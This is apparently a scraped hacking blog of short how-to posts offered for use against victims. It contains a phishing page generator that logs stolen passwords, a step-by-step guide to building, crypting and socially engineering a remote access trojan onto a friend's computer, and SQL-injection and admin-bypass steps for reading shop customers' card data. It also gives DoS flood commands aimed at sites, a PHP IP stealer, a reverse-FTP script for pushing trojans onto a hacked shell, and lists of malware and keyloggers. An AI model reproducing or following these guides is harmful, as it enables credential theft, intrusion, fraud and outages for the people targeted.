Ultraphish - Easy Phishing Page

Ultraphish - Easy Phishing Page Generator

Ultraphish - Easy Phishing Page Generator - Shaify Mehta

This program is (as stated) a phishing page generator, with compatibly for user-made plugins as well. With this bundle you will receive the following--
Hotmail (old)
Login Live
Messblack Forums
MillerSmiles Forums
Mob Life
MSN Delete Checker
Windows Live Mail
World of Warcraft
This is just a small collection of requests I have received. I am open to requests but I will not do PayPal or bank sites. If it is requested enough, I can write up a tutorial on how to create your own plugins.
I may also create a video tutorial upon asking.

How To Use:

Here is a brief (but sweet) tutorial:
Choose a password (This will be used later on)
Pick a Template from the list to be created
Generate your page
Upload it to a php host
Viewing your Logged Passwords:
Probably the most important part of the entire thing.
To view your logged passwords browse to (
) and enter 'viewlog' into the email/username field and the password you chose in step 1.
If your password was correct you will be taken to the page with your phished accounts along with their IP Address.

You do not need an email address and nothing is stored on an outside server so it's completely independent.

If you have any questions, simply ask and I'd be happy to answer them. Same goes with requests and such.

I hope I explained everything properly, and enjoy!

EDIT: Yes, I am aware that my website is offline. It has been for quite some time. The branding is simply incase I should ever decide to bring it back.

EDIT 2: Thanks to Dwayne for remind me. There is a 'bug' in the program where when using Vista it will generate a blank php file instead of your phishing page. I am aware of this and have no intentions to fix this in the near future.

VTC Ethical Hacking Video

VTC Ethical Hacking Video

02.Ethical Hacking & Penetration Testing
03.Methodology Overview
04.Reconnaissance (Footprinting)
06.Port & Service Enumeration
07.Data Enumeration
08.Vulnerability Assessment
09.Penetration Access Compromise Pt.1
10.Penetration Access Compromise Pt.2
11.Evading Defenses & Erasing Tracks
12.Introduction to Hacking Techniques Pt.1
13.Introduction to Hacking Techniques Pt.2
14.Popular Tools
15.Penetration Test Demo




Use GMail As An Online Storage System

Use GMail As An Online Storage System

This is a fairly simple and useful trick to score yourself a gigabyte's worth of free online file storage.
GMail Drive is a Shell Namespace Extension that creates a virtual filesystem around your Google Gmail account, allowing you to use Gmail as a storage medium.
GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer. GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to.

Download GMail Drive-

download Ultimate Hacking Eexperience 2008

Ultimate Hacking Eexperience 2008

  • Yuri RAT v1.2
  • MofoTro v1.7 BETA
  • Charon
  • Beast v2.0.7
  • Omerta v1.3
  • Theef v2.10
  • Combined Forces R.A.T
  • MoSucker v3.0
  • ProRat v1.9 Fix2
  • Daemon Crypt Public v2
  • NT Packer v2.1
  • EES binder v1.0
  • File Injector v3
  • Bytes Adder
  • FreshBind v2.01
  • YAB v2.01
  • NakedBind v1.0
  • Amok Joiner
  • Hippi virus
  • Sasser
  • W32. Blaster .Worm
  • Midnight Massacre
  • 00001
  • Nimda
  • Loveletter virus
  • Happy '99
  • MXZ
MSN Hacks & Bots
  • HoaX Toolbox 1.1
  • MSN Extreme 3.0
  • MessenPass v1.06
  • Advanced Blood Scroller
  • Nudge Madness
  • Advanced Instant Messengers Password Recovery
  • Contact Spy
  • Msn Explosion
  • Encrypted Messenger
Nukers And Flooders
  • Rocket v1.0
  • RPCNuke v1.0
  • Panther Mode1 - 56k
  • Panther Mode2 - ISDN +
  • Final Fortune v2.4
  • Battle Pong - Technophoria
  • Assault v1.0
  • ICMP Nuker
  • CLICK v2.2
Brute Forcers
  • Munga Bunga 's Official
  • Brutus - Authentication Engine Test 2
  • wwwHack v1.946
  • FTP Brute Hacker
  • FTP Brute Forcer.tar.gz - Unix
  • Wbrute.tar.gz - Unix
  • Shadow Scanner-Brute Forcer
  • Hackers Utility v1.5
  • POP3 brute forcer.tar.gz - Unix
  • Elite Keylogger v1.0
  • SKL v0.1
  • KeySpy v2.0
  • A++++
  • Curiosity
  • Keylogger
  • KeyCopy
CGI-Bug Scanners
  • NStealth HTTP Security Scanner v5.8
  • Attack Toolkit v4.1 & source code included
  • Scanarator
  • Legion NetBios Scanner v2.1
  • NetView v1.0
  • CGI Vulnerability Scan
  • CGI Scanner v4.0
  • VoidEye CGI scanner
Virus Builders
  • DR VBS
  • VBSwg 2 beta - Virus builder
  • p0ke's WormGen 2.0
  • RESIDUO - DoS Virus
Port & IP Scanners
  • Blues Port Scanner
  • ProPort v2.2
  • SuperScan v3.0
  • Net Scan Tools v4.2
  • LanSpy v2.0
  • Bitchin Threads v3.1
  • Trojan Hunter v1.5
  • SuperScan v4.0
  • Neotrace PRO v3.25 trial&crack say thanks if you like this 1Tongue

Track Anyone Just By Sending Mail

Track Anyone Just By Sending Mail

Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...

Once u have it.

Go to

register there...

Once registered . . . send a mail to ur victim by the email id u registered at

But before sending the mail just add "" with the victims id.. for example

and then send it...

when ever victim opens it his all the info will be mailed to u.

which can b very useful for the hackers.

Note = U can also change the settings in

SQL Injection the complete Tutorial

SQL Injection the complete Tutorial

Translated from Portugease :

SQL injection is a technique that explores a vulnerability of security that occur in the database of a layer of application. The vulnerability i present when user input i either incorrectly filtered will go string literal escape characters embedded in SQL statements or user input i not strongly typed and thereby unexpectedly executed. The vulnerability is present when user is or incorrectly screened for literal cord escape built-in characters in the instructions SQL or users strongly are not typed and, like this, unexpectedly performed. It i in fact an instance of it lives general class of vulnerabilities that can occur whenever one programming or scripting language i embedded inside another. It is in fact an example of a form more general class of vulnerabilities that can occur whenever a programming language or scripting is inserted inside another. __________________________________________________ ___________________ Or Be an a lot Way NooB of invade a big quantity of sites. ...........

For that vc is going to be necessary. .....

*Google *internet Connected *Strings *codicos of Sql injection *JAP (is not necessario is good use barely as

Then vamu her. ...............como I am baunzinho I see passes them half from the trabaio. ...

' to admin shell root First
vc goes in the google and digitizes the following one (allinurl: "Some Of The Strings") Without "Parenteses"

ah vc chooses a site noob applies in the login by example:' or' = 1 sign to same thing:' or' = 1

Promptly now vcs can vary the codicos and itself will want polpar work use some scanner of vulnerability as by example the acunetrix __________________________________________________ ___________________
JAP 00.08.073

JAP — Anonymity & Privacy is a program that is going to guarantee to his privacy while sails for the internet. With that, you avoid that can monitor your accesses and guarantees the your anonymity by the net.

__________________________________________________ __________________

Acunetix Web Vulnerability Scanner 5,0

Omprove itself his site is to the Test of hackers Acunetix Web Vulnerability Scanner is a powerful utility one that analyzes a site in search of possible vulnerabilities.

Text messaging from a computer

Text messaging from a computer

Q. How do I address a message to a digital telephone using Email?
A. Please contact your provider if your provider is not listed below.

AirTouch Cellular


Ameritech Cellular

AT&T Wireless

Bell Atlantic


Cellular One

Not available from carrier

Cingular Wireless

Comcast Cellular

gte wireless



PacificBell/Nevada Bell


Southwestern Bell





Triton pcs

U.S. West



note : Not all of the above may work. Try them, coz some of them work like charm.


Other Carriers:

3 River Wireless
acs wireless
Advantage Communications
Airtouch Pagers
Airtouch Pagers
Airtouch Pagers
Airtouch Pagers
Alltel pcs
Ameritech Paging
Ameritech Paging
Ameritech Clearpath
Andhra Pradesh Airtel
Arch Pagers (PageNet)
Arch Pagers (PageNet)
Arch Pagers (PageNet)
AT&T pcs
AT&T Pocketnet pcs
BeeLine gsm
Bell Atlantic
Bell Canada
Bell Canada
Bell Mobility (Canada)
Bell Mobility
Bell South (Blackberry)
Bell South
Bell South
Bell South
Bell South
Bell South Mobility
Blue Sky Frog
Bluegrass Cellular
BPL mobile phonenumber@bplmobile.comCable & wireless, Panama cellnumber@cwmovil.comCarolina Mobile Communications
Cellular One East Coast
Cellular One South West
Cellular One pcs
Cellular One
Cellular One
Cellular One
Cellular One
Cellular One
Cellular One
Cellular One West
Cellular South
Central Vermont Communications
Chennai rpg cellular
Chennai Skycell / Airtel
Cincinnati Bell
Cingular Wireless
Cingular Wireless
Cingular Wireless
Communication Specialists
Communication Specialist Companies
Cook Paging
Corr Wireless Communications
Delhi Aritel
Delhi Hutch
Digi-Page / Page Kansas
Dobson Cellular Systems
Dobson-Alex Wireless / Dobson-Cellular One
DT T-Mobile
Dutchtone / Orange-NL
Edge Wireless
Galaxy Corporation
gcs paging
Goa bplmobil
Golden Telecom
GrayLink / Porta-Phone
Gujarat Celforce
Houston Cellular
Idea Cellular
Infopage Systems
Inland Cellular Telephone
The Indiana Paging Co
jsm tele-Page
Kerala Escotel
Kolkata Airtel
Lauttamus Communication
Maharashtra bpl mobile
Maharashtra Idea Cellular
Manitoba Telecom Systems
mci phone
Metrocall 2-way
Metro pcs
Metro pcs
Midwest Wireless
Mobilecom PA
Mobility Bermuda
Mobistar Belgium
Mobitel Tanzania
Mobtel Srbija
Morris Wireless
Mumbai bpl mobile
Mumbai Orange
npi wireless
O2 (M-mail)
One Connect Austria
Optus Mobile
Orange Mumbai
Orange - NL / Dutchtone
P&T Luxembourg
Pacific Bell
PageMart Advanced /2way
PageMart Canada
PageNet Canada
PageOne NorthWest
pcs One
Personal Communication (number in subject line)
Pioneer / Enid Cellular
Pondicherry bpl mobile
Price Communications
Public Service Cellular
ram page
Rogers AT&T Wireless
Rogers Canada
Satelindo gsm
sbc ameritech Paging
sfr france
Skytel Pagers
Skytel Pagers
Simple Freedom
Smart Telecom
Southern linc
Southwestern Bell
Sprint pcs
ST Paging
Sunrise Mobile
Sunrise Mobile
Surewest Communicaitons
T-Mobile Austria
T-Mobile Germany
T-Mobile UK
Tamil Nadu bpl mobile
Tele2 Latvia
Telefonica Movistar
Telia Denmark
tsr wireless
tsr wireless
US Cellular
US Cellular
US West
Uttar Pradesh Escotel
Verizon Pagers
Verizon pcs
Verizon pcs
Virgin Mobile
Virgin Mobile
Vodafone Italy
Vodafone Japan
Vodafone Japan
Vodafone Japan
Vodafone Spain
Vodafone UK
VoiceStream / T-Mobile
WebLink Wiereless
WebLink Wiereless
West Central Wireless
Western Wireless

Site attacking Program

Site attacking Program
With this program can you attack a site.
Its very simple. There is a tutorial video in it!~

Site attacking Program - Shaify Mehta

SQL Injection1

SQL Injection...

Since the most popular web hacking technique is the sql injection I think you should learn about it. You should know a web scripting language(php is the most popular) and an sql database(MYsql is the most popular) to understand the sql injection. I thought in this topic we can share our knowledge and resources.

This is one of the documents I liked. It's written by cypherxero;

With the growing popularity of websites using the standard php/sql interfaces, a new and dangerous
type of attack is becoming more popular for hackers, and that is sql injection. sql, or Standard Query
Language, is a type of database specification for reading and writing information to a database. This is
used to create dynamic webpages with structured content, and other data types.

The problem is not actually a problem with the sql database itself, but rather how it is accessed
and used via the scripting language on the website. The standard scripting language on the web for
interacting with sql databases is php. The real issue lies with the php programmers not writing the sql
statements correctly, which can allow an attacker to inject their own commands directly to the sql
database. Here's a sample of php code that dynamically builds a sql command to be processed:

$sql = "select * from users where username='".$_GET['username']."' and password = '".md5($_GET['password'])."'";

The sql command would look like this to the database:

select * from users where username='cypherxero' and password = '5f4dcc3b5aa765d61d8327deb882cf99';

This would lookup my username (cypherxero), and then compare the password hash with the one in the
database. If they're the same, then I'm authenticated, and logged in. The problem with this statement is
that there is no sanitation on the user input, so if you entered your own sql command, say for this login
box, then you can bypass authentication!

Consider this sql Statement:

' OR 1=1--

Inserting this into the sql command that already exists, we get this:

select * from users where username='' OR 1=1--' and password = '5f4dcc3b5aa765d61d8327deb882cf99';

This statement would return true (since 1 does equal 1), and the rest of the sql statement after the
double-dashes will be commented out, and the system will return the first username in the database, and
log you into the system as the first user (most likely admin) without the need for a password!

Other ways of using sql injections is with http get statements that pass variables onto the database.
Let's take a look at a real sql injection I found a few weeks ago, in a component on the Joomla CMS. I
first discovered this flaw while doing some random web app sec testing on one of my friend's company's
website. Let's take this url from her site:

As you can tell, we're passing the variables option, Itemid, and form_id to index.php, and the php script
is passing those variables onto the sql database. Let's see what happens when I insert a single tick mark
at the end of the last variable:

You have an error in your sql syntax; check the manual that corresponds to your Mysql server version for
the right syntax to use near \'\\' order by ordering ASC\' at line 1 sql=select * from
jos_philaform_detail where form_id=5\\' order by ordering ascno elements defined

Since we passed a variable that the database didn't know what to do with, it freaked out and returned an
error message. Now, any sane person that's not a hardcore geek would just think something wrong happened,
and try another website. Not me. I knew right then from seeing that message that I had a sql injection,
and that I wanted to see what I could do. I searched google, milw0rm, packetstorm, and securityfocus, and
couldn't find a sql injection for Phil-a-Form, which upon further research, was a piece of software for
Joomla to add extra functionality. So, I figured either it was impossible to get an injection and had been
done before without any luck, or that no one had found it yet. It turns out no one had found it yet, and
now it was a race against the clock to find a proof-of-concept injection and submit it before someone else
found it.

There's a nice little sql command called union that combines data from more than one table into one
output, and that's what I was going to need. My goal was to get the administator password (in MD5 hash
format) from the database. The sql statement from the error messaged helped me understand what was going
on with the query, and helped me write my injection. I knew that it was pulling data from the sql database
for the forms that were on the page. I needed to combine that form table and data from another table onto
one page. I did some research on Joomla, and found the list of the default sql tables, and the format that
they were in. I knew I needed to pull the password from the jos_users table, and that the password field
was called password.

Since union commands need to keep the columns the same for both tables, there were a lot more tables in
the jos_philaform table than in the users table, so to keep the tables the same for the union command, I
had to fill the injection string with enough nulls to make them the same. Since Phil-a-Form is
pay-software, I didn't feel like putting my money down on software that I don't need, so it was just a
matter of trial and error until I had the correct column size. The final sql injection string looked
looked like this:

union select null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,
from jos_users --

This statement, put on the end of the "form_id=5", pulled the password has from the database, and returned
it to me on the page. The final result was the form on the page, but at the very bottom, a nice little
error message, with, lo and behold, the MD5 hash of the first user in the table, the administrator.

Fatal error: Cannot instantiate non-existent class: philaform_5f4dcc3b5aa765d61d8327deb882cf99 in
/home/klochko/public_hhtml/components/com_philaform/philaform.class.php on line 437

There it was, what I was looking for, the password in MD5. All that was left was to crack it using rainbow
tables, and then if I was malicous, to log into admin and deface the website, or do whatever I wanted at
that point. My friend's website has since been upgraded to the newer version of Phil-a-Form, and no, that
is not the real admin hash, I don't think they would make their password "password".

Sify Hack For Free Internet !

Sify Hack For Free Internet !

Use Internet For Free, only sify users

U need are a few utilities like angry ip scanner and a Mac Address changer like Gentle Mac Pro. What you got to do fist is scan your ip range and see who all are online then get their mac address. Then use Gentle Mac Pro and change your ip and mac address to some one who is logged on and Bingo you surfing the net for Free. Here are the Link'z

Angry Ip Scan

Gentle Mac Pro Version 3

Remote Hacking

Remote Hacking

n this tutorial you will learn how to hack a computer any where in the world. Ok well not anywhere obviously things like the military and the goverment will have very high security so you definately wont be able 2 hack them using this method. I hope not aniways =\.

A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to google and search It will teach you how to port forward your router there.

Ok to begin with you will need these three tools

Daemon Crypt -
Pc Guard -
Yuri Rat -
Ok now that you have these three tools your 1st step will be to open up Yuri Rat and then click on server build

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

n this screen I want you to put your IP address into the DNS/IP section.

To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address

Port: You Can Leave As Default (-789Cool

Assigned Name: Doesn?t effect how the server will work its just to keep you more organized so if you wanted to hack your friend ?JOE? and specifically make this server for him then you may want to type something like ?JOES TROJAN?.

Server Install Name: You should leave this as default as I myself don?t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.

Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes

To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift

To Find Out Valuable Information: Check Everything

Ok Now You Are Finished Click Build

Your server will then be saved to your C:\ or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin

Open Up Daemon Crypt

Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:\

So Now You Have This

Remote Hacking - Shaify Mehta

Click On Crypt and then you can close Daemon Tools

Now Install Your Pc Guard for Win32

When you open it you should get this

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

You then want to click on the General Settings and put these settings
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok now you want to go to customization and make sure nothing is ticked
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

For the last step you want to click the protection methods tab and set it to plain. And then click on protect
Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Your server is now undetectable =)

Ok so now we have our server and everything is ready to go. Only thing now is to do some social engineering. Basically just lie to your friend/victim and tell them that it is a harmless file. If you do not know anything about your victim talk 2 him for like 3 days find out what he likes. Then lets say he likes football and naked women XD. say to him its a funny game where you play a 5minute 2D football match and if you win a sexc girl comes up on the screen and strips or something along them lines. Im not to good at social engineering. You could even say to your friend/victim that it is a patch for a game that you know that they have and it adds on extra things. The Server is now on there computer and they have double clicked it. If you checked the melt server option then the server will basically evaporate into their computer. They say hey its not working you say hey thats strange it works on my comp. Ahh fuck it i cant b bothered 2 send it again..

Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.

Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to your friend/victim a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim

Remote Hacking - Shaify Mehta Click this bar to view the small image.
Remote Hacking - Shaify Mehta

Ok now without uploading plug ins from yuri rat to your friends/victims computer you will only be able to do limited things with the program which are Download files from there comp & put files from your comp onto their comp.

When you are connected click on plug ins and them upload all of them.

You will then have access to keyloggers, screen capture and muc more. If you get stuck click on the help button and it wil tel you more aout plug ins


Rapidshare Solution Hack 2008 Edition

Rapidshare Solution Hack 2008 Edition

Rapidshare And Megaupload Search Plugin Maker
Rapidshare Anti Leech Decrypter 4.0
Rapidmule Rapidshare Downloader
BrutalDown Rapidshare Tips And Hints
Rapidshare/Megaupload Speeder
Rapidshare-The Way You Like It
Rapidshare Account Generator
Rapidshare Leeching ******s
Unlimited Rapidshare With IE
Premium Account Checker
Rapidshare Links Decoder
Renew IP - Gigaset SE105
Rapidshare Time Resetter
RapidLeecher v4.5 Beta
Mac Rapid1.6a Beta11
Premium Accounts 115
RapidLeecher v4.4.87
Rapidshare Checker
Briefcase Leecha 1.83
Rapidshare Decoder
USDownloader 1.3.3
Get Rapidshare 6.0
Rapget v0.96 Beta
The Grabber v1.4.1
Link Grabber v3.1.4
MegaLeecher 1.0.4
Rapidget v1.0
RapidUp v1.1

Rapidshare Solution Hack 2008 Edition - Shaify Mehta
Rapidshare Solution Hack 2008 Edition - Shaify Mehta

Password :-

PhP Ip Stealer

PhP Ip Stealer

$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}

Replace with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbox..

Putting A Site Down

Putting A Site Down

As simple as 123, follow these easy instructions and you will learn how to put a site down. Its a common activity but its for those who are not familiar with this.

1. Download NetTools 4.5

2. Install the tool

3. Start NetTools and press: Control + M (Reslove Host-IP)
in this tool you can reslove the ip of a host, example below:

Putting A Site Down - Shaify Mehta

4. Now press: Control + X (HTTP Flooder (DoS))
and fill in the fill in the following:

Putting A Site Down - Shaify Mehta

IP to Flood: IP from host (control + m)
Port: 80 (HTTP)
Connections: 9999 (connect with 9999 connections at the same time)

5. Now press Start, however almost all the time just 9999 connections isn't enough sometimes a site needs 49995 (5 times 9999) before its down, hf.

Its old but some weak sites are easy to put down :D (like school sites)

Page hits flooder

Page hits flooder

increasing page views of your websites

This small program can flood ur page hits.
but you have to dedicate one browser for it.. like internet explorer
make a batch file with these lines
@echo off
start C:\Progra~1\Intern~1\iexplore.exe “
ping -n 10 >nul
taskkill.exe /im iexplore.exe
goto 1

depending upon your net speed u may increase the 10 secs time wait
with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

Kr3w's Cross-Site Scripting Tutorial

Kr3w's Cross-Site Scripting Tutorial

Kr3w's Cross-Site Scripting Tutorial ##
## Site: ##
## ##
## ##
## ##

I. What is XSS (Cross-Site Scripting)
II. How does XSS affect the web today
III. How important is XSS and its vulnerabilities
IV. Different types of XSS
V. Finding XSS holes in websites
VI. XSS - Explained
VII. HRS - HTTP Response Splitting
VIII. References

Part I. What is XSS (Cross-Site Scripting)?

XSS, short for what is known as Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage for important feedback. This feedback may contain many things; one, most commonly being the user's cookie. Now, for everybody reading this, I assume that you know what a cookie is and how it is used on webpage, but if not, I will explain it anyways.

A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on your favorite websites. This is important because if somebody were to obtain your cookie, he/she could easily spoof your login information without any need of knowing your password. Some cookies are pretty basic, like the PHPSESSID, which is just your session on a PHP powered page. If the website only used the PHPSESSID cookie to authenticate its users, somebody can steal the cookie via an XSS vulnerability and spoof whoever's cookie the attacker possesses.

Part II. How does XSS affect the web today?

XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today. It is dangerous because it is common (and useful), and it is common because it is most overlooked. Most WebPages today are user-interactive, which basically means that the website allows the user to interact with its content. Some of this interactivity may include search fields (most commonly), login forms, comment fields, feedback forms etc..

I would say that nearly 90% of the websites that are on the internet today suffer from XSS flaws. Even some of the more popular government sites suffer from XSS flaws. This shows lack of responsibility, lack of security, and most importantly being the lack of security. When internet warfare is at an all-time new, the governments and their domains cannot afford to be compromised so easily.

Part III. How important is XSS and its vulnerabilities?

The reason XSS is so important, is like I explained above. It is so common, that virtually any website that is user-interactive is vulnerable. The problem with this is that internet crime is also at an all time high along with internet warfare. The importance of XSS flaws is greatly underestimated. Most websites today look past all the XSS flaws and see them as nothing too important to cleanse. The problem with this is the fact that any attacker with half a brain can compromise pretty much any website he/she wishes.

Part IV. Different types of XSS.

There are many ways to prove that XSS flaws exist, the most common (for me at least) are these 2:
a) Basic XSS (user-form reflect back XSS).
b) HTTP Response Splitting.

1. Basic XSS

a. This is something simple, like a search field that allows HTML input. When the user searches for something and the input is reflected on the following page, this may show signs of XSS possibilities. Now, when a user searches for something like


, if the page returned contains a large heading that reads "test", the field is vulnerable to HTML injection. If the user were to search for , and the returning page contained and alert box that read "1", the field is also vulnerable to XSS Injection.

2. HTTP Response Splitting

a. This has something to do with the headers that your browser uses to communicate to the server with. If the webpage allows you to modify them via post or get vars, and reflects the information back, you can easily modify these headers to your needs in order to cross-site script the page. Most commonly, the header's that are XSS'able are the User-Agent: headers. Most pages don't sanitize the user agent when reflecting back the user's browser properties (most commonly on a 404 page.)

Part V. Finding XSS holes in websites.

The easiest way to find XSS holes in websites is manually. I'm sure you can write a script to do it for you, but that takes the fun out of it.

When searching for holes, you might want to check these fields:
a) Search Field
b) Comment Fields
c) Feedback Forms
d) Login Forms
e) Error Pages

Those are just some of the common pages that contain XSS flaws in websites. Granted, some might be sanitized (although rare).
To see if they are vulnerable, I use simple syntax for both HTML and JavaScript. "


" and "". I know if the following page has either a large heading that reads "a" or an alert box that says "1", the field is vulnerable.

If you're looking through PHP source code or any source code, and you see GET or POST vars that are un-sanitized, then you also know that they are vulnerable. Some examples of both Stripped and Un-stripped PHP:




How To Send DoS Attack With CMD

How To Send DoS Attack With CMD

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

DoS Attack Stands For Denial of Service Attack
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

No problem.. here is the solution..
open ur CMD (command prompt).. and type
nslookup Site-Name
(e.g nslookup

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

This All System Is Known As "PING OF DEATH"

------------->> This Tutrial Is Made By _FlopAdmi_ For Educational Purposes Only!! <<------------------

Download Tutrial:

How to make a torrent on uTorrent

How to make a torrent on uTorrent

How to make a torrent on uTorrent

1. Download and install uTorrent. Open uTorrent.

2. Select the files and or directories

3. File > Create new Torrent (or CTRL + N)

4. Trackers: This is probably the hard part for most people. But it’s pretty easy, just put in one of the popular public trackers. You can use one or more trackers, but in general one is enough.

Here are some good trackers you can use:

Code: udp://
Put one of these in the tracker box.

5. Do NOT tick the private torrent box (unless you’re using a private tracker)

6. Save the torrent.

7. For use on asta please upload it to mediafire, rapidshare or a similiar site and post.

Make sure your client is ready to seed to those who want the file before you upload, though, or else no one will get it.

In order to keep a healthy, productive swarm, make sure to seed for a few days, or even a week or two. You never know if people are going to seed after downloading, after all, so you?ll probably have to carry on the torch for a while.

How to Reverse FTP with command prompt

How to Reverse FTP with command prompt

Wanna upload files to a remote computer? (trojans ect.)

well , reverse ftp'ing :

i explain it in few steps :

1 - configure a good ftp server on your pc and run it
2 - choice good username and password for your ftp server
3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory
4 - in hacked command shell enter the following commands :

echo off
echo open>transfer.txt ;put your IP
echo your-user-name>>transfer.txt ;for your ftp server
echo your-password>>transfer.txt ;for your ftp server
echo get file1.exe>>transfer.txt ; any file or trojan to upload
echo get file2.exe>>transfer.txt ; any file or trojan to upload
.... ; may be continued as needed
.... ; may be continued as needed
echo quit >>transfer.txt ; end of uploading transfer

ftp -s:transfer.txt ; ftp'ing script

How-To Make All Viruses/Trojans Undetectable

How-To Make All Viruses/Trojans Undetectable

How-To Make All Viruses/Trojans Undetectable!

this tut is not tested so if u try it n it works plzz let me know ty

This tutorial teaches you how to make all viruses undetectable by ALL antivirus software.

1) Get your trojan, virus, keylogger or what ever you want to make undetectable.

2) Download Software Passport (Armadillo) by Silicon Realms.

3) After you have downloaded it, install and run the application.

How-To Make All Viruses/Trojans Undetectable - Shaify Mehta

4) Download these settings for the application.

Download this file for a backup. (You need this in the same location as the projects.arm file)

5) Once you have download these files and put them in the same folder, open Software Passport and click Load Existing Project (top left). Where it says "Files to Protect" delete everything and add all the files you want to make undetectable.

6) When you have finished step 5, go to the bottom right and click "Build Project." Proceed.

You can visit the following website to see if your file is undetectable.

How to increase your BitTorrent Speeds

How to increase your BitTorrent Speeds

although it doesn't really do much of a difference for me because it all depends on how many seeders/leechers are uploading, but here's how it works:

- an internet connection, must be high speed of course...
- Windows XP Professional or Windows 2003

**note** this trick will increase your bandwidth usage, if your Internet Service Provider (ISP) limits your bandwidth, I suggest that you don't do this trick...
This part will increase your bandwidth usage by 20% meaning, you will get a faster internet speed (or your full speed...). start run
3.type gpedit.msc
4.on the right hand side, press computer configuration administrative templates network QoS Packet Scheduler Limit reservable bandwidth will see it being set default as "not configured". You will now press "enable". Change the value from 20% to 0%. Pressing "disable" will result nothing.
10. press apply

now, a huge amount of people have been complaining over these past years that Windows XP Service Pack 2 has slowed their internet down. Service Pack 2 limits only 10 simultaneously incomplete outbound TCP connections, Service Pack 1 on the other hand, allows about 16777214 connections (or somewhere near there). The reason why Microsoft has limited to 10 connections only is to "prevent" worms/viruses from infecting your computer faster, this will therefore slow down your downloading speeds as well.

1.go download
2.if you have a crappy antivirus like Norton, or McAfee or AVG, changing it to 50 should be enough....
if you have good antivirus like NOD32, then you can freely change to 16777214 (that's what im using right now...)
3.If Windows pops up asking you to insert a Windows XP SP2 CD, press ignore.

although this won't have a significant improvement, but it's just changing the limits. And use uTorrent.

If you're thinking why you can't download using BitTorrent even if you have high speed, it's because your ISP is throttling your internet connection. I suggest you using uTorrent, and then on options---->preferences----->Bittorrent---->under protocol enryption, enable that, and you should see a higher speed than you have before...


How To Hack Shop Admin

How To Hack Shop Admin

Simple Way To Getting A Simple Shop Admin
Hidden part:

1) go to
2) in google type cart.php?m=view
3) Go to pages 24-54
4) Right click and open in a new window
5) Your link should be something similar to
6) Change that to:
7) Type this for username and password: "=" make sure you include the "
8) You should be loged in as admin, if that does not work , they have either been Hacked , Password changed or wrong version to expliot/patched.

9) If you do get loged in go to the orders section.
10 Click on a Order# and see the CC's info , Some Shops

Find IP Address Of An Email Sender

How To Find IP Address Of An Email Sender

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding I.P Address In Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding I.P Address In Yahoo Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
